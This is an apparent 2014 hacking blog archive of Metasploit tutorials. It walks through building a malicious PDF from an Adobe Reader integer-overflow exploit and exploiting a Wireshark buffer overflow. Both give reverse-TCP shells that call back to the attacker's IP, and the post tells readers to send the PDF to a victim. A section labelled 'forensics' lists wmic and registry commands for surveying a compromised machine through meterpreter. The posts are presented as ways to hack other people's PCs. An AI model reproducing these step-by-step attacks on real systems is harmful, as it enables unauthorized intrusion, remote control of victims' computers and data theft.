Offensive Security Blog: 2014

วันอาทิตย์ที่ 2 มีนาคม พ.ศ. 2557

Forensics Investigation of Remote PC

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you got the meterpreter session use ‘shell ‘command to get command prompt of the target.

Now type wmic /? Displays help

wmic cpu list full – get Name, Caption, MaxClockSpeed, DeviceID, and etc status

wmic memory chip – to get get Bank Label, Capacity, Caption, Creation ClassName, DataWidth, Description, Device locator, Form Factor, HotSwappable, Install Date etc.

wmic process list full – to get Caption, CommandLine, Handle, HandleCount, PageFaults, PageFileUsage, PArentProcessId, ProcessId, ThreadCount

wmic startup – to get Caption, Location, Command

wmic bios – get name, version, serial number

wmic bootconfig – get BootDirectory, Caption, TempDirectory, Lastdrive

wmic startup – get Caption, Location, Command

wmic useraccount – get Account Type, Description, Domain, Disabled, Local Account, Lockout, Password Changeable, Password Expires, Password Required, SID

wmic driver – get Caption, Name, PathName, ServiceType, State, Status

wmic share – get name, path, status

baseboard	get Manufacturer, Model, Name, PartNumber, slotlayout, serialnumber, poweredon
cdrom	get Name, Drive, Volumename
computersystem	get Name, domain, Manufacturer, Model, NumberofProcessors, PrimaryOwnerName,Username, Roles, totalphysicalmemory /format:list
datafile	where name=’c:\\boot.ini’ get Archive, FileSize, FileType, InstallDate, Readable, Writeable, System, Version
dcomapp	get Name, AppID /format:list
desktop	get Name, ScreenSaverExecutable, ScreenSaverActive, Wallpaper /format:list
desktopmonitor	get screenheight, screenwidth
diskdrive	get Name, Manufacturer, Model, InterfaceType, MediaLoaded, MediaType
diskquota	get User, Warninglimit, DiskSpaceUsed, QuotaVolume
environment	get Description, VariableValue
fsdir	where name=’c:\\windows’ get Archive, CreationDate, LastModified, Readable, Writeable, System, Hidden, Status
group	get Caption, InstallDate, LocalAccount, Domain, SID, Status
idecontroller	get Name, Manufacturer, DeviceID, Status
irq	get Name, Status
job	get Name, Owner, DaysOfMonth, DaysOfWeek, ElapsedTime, JobStatus, StartTime, Status
loadorder	get Name, DriverEnabled, GroupOrder, Status
logicaldisk	get Name, Compressed, Description, DriveType, FileSystem, FreeSpace, SupportsDiskQuotas, VolumeDirty, VolumeName
memcache	get Name, BlockSize, Purpose, MaxCacheSize, Status
memlogical	get AvailableVirtualMemory, TotalPageFileSpace, TotalPhysicalMemory, TotalVirtualMemory
memphysical	get Manufacturer, Model, SerialNumber, MaxCapacity, MemoryDevices
netclient	get Caption, Name, Manufacturer, Status
netlogin	get Name, Fullname, ScriptPath, Profile, UserID, NumberOfLogons, PasswordAge, LogonServer, HomeDirectory, PrimaryGroupID
netprotocol	get Caption, Description, GuaranteesSequencing, SupportsBroadcasting, SupportsEncryption, Status
netuse	get Caption, DisplayType, LocalName, Name, ProviderName, Status
nic	get AdapterType, AutoSense, Name, Installed, MACAddress, PNPDeviceID,PowerManagementSupported, Speed, StatusInfo
nicconfig	get MACAddress, DefaultIPGateway, IPAddress, IPSubnet, DNSHostName, DNSDomain
ntdomain	get Caption, ClientSiteName, DomainControllerAddress, DomainControllerName, Roles, Status
ntevent	where (LogFile=’system’ and SourceName=’W32Time’) get Message, TimeGenerated
onboarddevice	get Description, DeviceType, Enabled, Status
os	get Version, Caption, CountryCode, CSName, Description, InstallDate, SerialNumber, ServicePackMajorVersion, WindowsDirectory /format:list
pagefile	get Caption, CurrentUsage, Status, TempPageFile
pagefileset	get Name, InitialSize, MaximumSize
partition	get Caption, Size, PrimaryPartition, Status, Type
printer	get DeviceID, DriverName, Hidden, Name, PortName, PowerManagementSupported, PrintJobDataType, VerticalResolution, Horizontalresolution
printjob	get Description, Document, ElapsedTime, HostPrintQueue, JobID, JobStatus, Name, Notify, Owner, TimeSubmitted, TotalPages
product	get Description, InstallDate, Name, Vendor, Version
qfe	get description, FixComments, HotFixID, InstalledBy, InstalledOn, ServicePackInEffect
quotasetting	get Caption, DefaultLimit, Description, DefaultWarningLimit, SettingID, State
recoveros	get AutoReboot, DebugFilePath, WriteDebugInfo, WriteToSystemLog
Registry	get CurrentSize, MaximumSize, ProposedSize, Status
scsicontroller	get Caption, DeviceID, Manufacturer, PNPDeviceID
server	get ErrorsAccessPermissions, ErrorsGrantedAccess, ErrorsLogon, ErrorsSystem, FilesOpen, FileDirectorySearches
service	get Name, Caption, State, ServiceType, StartMode, pathname
sounddev	get Caption, DeviceID, PNPDeviceID, Manufacturer, status
sysaccount	get Caption, Domain, Name, SID, SIDType, Status
systemenclosure	get Caption, Height, Depth, Manufacturer, Model, SMBIOSAssetTag, AudibleAlarm, SecurityStatus, SecurityBreach, PoweredOn, NumberOfPowerCords
systemslot	get Number, SlotDesignation, Status, SupportsHotPlug, Version, CurrentUsage, ConnectorPinout
tapedrive	get Name, Capabilities, Compression, Description, MediaType, NeedsCleaning, Status, StatusInfo
timezone	get Caption, Bias, DaylightBias, DaylightName, StandardName

How to Find System Boot Time and Install Original Date

Systeminfo – Displays detailed configuration information about a computer and its operating system, including operating system configuration, security information, and product ID, and hardware properties, such as RAM, disk space, and network cards.

How to Detect Last Connected USB

Reg query hklm\system\CurrentControlSet\Enum\usbstor

How to View Recent Visit Documents

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs

How to View Last Used Command in Run Dialog Box

reg query hkey_current_user\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

How to View Installed software

Reg query hkcu/software

How to Find the All installed Drivers

Driverquery – Displays a list of all installed device drivers and their properties.

วันเสาร์ที่ 1 มีนาคม พ.ศ. 2557

Metasploit Tutorial for Beginners

The Metasploit Project is an open-source, computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the Metasploit Framework, a tool for developing and executing exploit code against a remote target machine.

Metasploit helps security and IT professionals identify security issues, verify vulnerability mitigations, and manage expert-driven security assessments.

Download Metasploit for Windows user

Download Metasploit for Linux user

Minimum System Requirements:

2 GHz+ processor
2 GB RAM available (4 GB recommended, increase accordingly with VM targets on the same device)
500MB+ available disk space
10/100 Mbps network interface card

Supported Operating Systems:

Windows XP, 2003, Vista, 2008 Server, and Windows 7
Red Hat Enterprise Linux 5.x, 6.x – x86 and x86_64
Ubuntu Linux 8.04, 10.04 – x86 and x86_64

Required Browser Versions

Mozilla Firefox 4.0+
Microsoft Internet Explorer 9
Google Chrome 10+

Basics Terms of Metasploit

Vulnerability: Vulnerability is a security hole in a piece of software, hardware or operating system that provides a potential angle to attack the system. Vulnerability can be as simple as weak passwords or as complex as buffer overflows or SQL injection vulnerabilities.

Exploit: “Exploit” refers to a well-known bug/hole that hackers can use to gain entry into the system.To take advantage of vulnerability, you often need an exploit, a small and highly specialized computer program whose only reason of being is to take advantage of a specific vulnerability and to provide access to a computer system.

Payload: A payload is the piece of software that lets you control a computer system after it’s been exploited. The payload is typically attached to and delivered by the exploit.

Metasploit Basic Command Tutorial

Msfconsole

Help

Help: it will show you the basic commands of Metasploit.

Show payloads

Show payloads: it will show you all the available payloads on Metasploit.

Show exploits

Show exploits: it will show you all exploits in Metasploit.

msf> use <exploit>	to use a exploit or payload
msf exploit (name)> set payload <paload name>	To add specified payload
msf exploit (name)> set rhost <victim ip>	To add victim ip address to specified exploit#
msf exploit (name)> set lhost <localhost ip>	To add attacker ip address to specified exploit#
msf exploit (name)> unset rhost	To remove rhost value
msf exploit (name)> unset lhost	To remove lhost value
msf exploit (name)> setg rhost <victim ip>	To add victim ip address globally
msf exploit (name)> setg lhost <localhost>	To add localhost(attacker) ip address globally
msf exploit (name)> sessions -l -v	To see list of sessions

Meterpreter Basic Commands

Help

The ‘help’ command, as may be expected, displays the Meterpreter help menu.

PS

The ‘ps’ command displays a list of running processes on the target.

LS

As in Linux, the ‘ls’ command will list the files in the current remote directory.

Ipconfig

The ‘ipconfig’ command displays the network interfaces and addresses on the remote machine.

Getuid

Running ‘getuid’ will display the user that the Meterpreter server is running as on the host.

Download

The ‘download’ command downloads a file from the remote machine. Note the use of the double-slashes when giving the Windows path.

Upload

As with the ‘download’ command, you need to use double-slashes with the ‘upload’ command.

Shell

The ‘shell’ command will present you with a standard shell on the target system.

How to Hack Remote PC using PDF

Adobe FlateDecode Stream Predictor 02 Integer Overflow

This module exploits integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions before 9.2.

Exploit Targets

0 – Adobe Reader Windows Universal (JS Heap Spray) (default)

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/fileformat/adobe_flatedecode_predictor02

Msf exploit (adobe_flatedecode_predictor02)>set payload windows/meterpreter/reverse_tcp

Msf exploit (adobe_flatedecode_predictor02)>show options

Msf exploit (adobe_flatedecode_predictor02)>set lhost 192.168.1.3 (IP of Local Host)

Msf exploit (adobe_flatedecode_predictor02)>set filename attack.pdf

Msf exploit (adobe_flatedecode_predictor02)>exploit

After we successfully generate the malicious PDF, it will stored on your local computer

/root/.msf4/local/attack.pdf

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.3

exploit

Now send your attack.pdf files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer

Y

Attacking on Remote PC if Victim is using Wireshark

Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow

The LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through 1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer overflow. This bug found and reported by babi. This particular exploit targets the dissect_getaddrsbyname_request function. Several other functions also contain potentially exploitable stack-based buffer overflows. The Windows version (of 1.2.5 at least) is compiled with /GS, which prevents exploitation via the return address on the stack. Sending a larger string allows exploitation using the SEH bypass method. However, this packet will usually get fragmented, which may cause additional complications. NOTE: The vulnerable code is reached only when the packet dissection is rendered. If the packet is fragmented, all fragments must be captured and reassembled to exploit this issue.

Exploit Targets

0 – tshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)

1 – wireshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)

2 – wireshark 1.2.5 on RHEL 5.4 (x64)

3 – wireshark 1.2.5 on Mac OS X 10.5 (x86)

4 – wireshark/tshark 1.2.1 and 1.2.5 on Windows (x86)

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/multi/misc/wireshark_lwres_getaddrbyname_loop

Msf exploit (wireshark_lwres_getaddrbyname_loop)>set payload windows/shell_reverse_tcp

Msf exploit (wireshark_lwres_getaddrbyname_loop)>set lhost 192.168.1.2 (IP of Local Host)

Msf exploit (wireshark_lwres_getaddrbyname_loop)>exploit

Before running the exploit command, let say that the attacker now still collecting data using their Wireshark tool like the picture below.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

Y

How to use Nmap (Beginner Tutorial)

Nmap (“Network Mapper”) is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime

First Download nmap From Here and install in your pc